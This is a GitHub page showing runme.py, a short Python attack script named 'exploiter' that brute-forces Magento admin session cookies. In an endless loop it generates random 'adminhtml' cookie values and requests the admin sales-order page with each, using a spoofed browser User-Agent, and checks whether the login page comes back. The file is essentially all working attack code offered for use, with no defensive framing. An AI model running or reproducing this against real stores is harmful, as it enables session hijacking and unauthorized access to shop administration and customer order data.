-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathrunme.py
35 lines (25 loc) · 1.07 KB
/
runme.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import random
import requests
import bs4
def cookies_gen():
alfanum = "0123456789abcdefghijklmnopqrstuvxwyz"
new_cookie = ""
for i in range(26):
new_cookie += random.choice(alfanum)
return(new_cookie)
class exploiter():
def __init__(self, site):
self.url = ("{site}/index.php/admin/sales_order/view/order_id/".format(site = site))
self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
def exploit(self, cookies = cookies_gen()):
cookies = {"adminhtml":cookies}
x_html = requests.get(self.url, cookies=cookies, headers=self.headers).text
html = bs4.BeautifulSoup(x_html, "lxml")
return(html.title.text)
if __name__ == "__main__":
new_exploit = exploiter(site="http://magento_ecommerce.no_slah")
while True:
cookies = cookies_gen()
if new_exploit.exploit(cookies = cookies) == "Log into Magento Admin Page":
print("BAD COOKIE >:(")
print(cookies)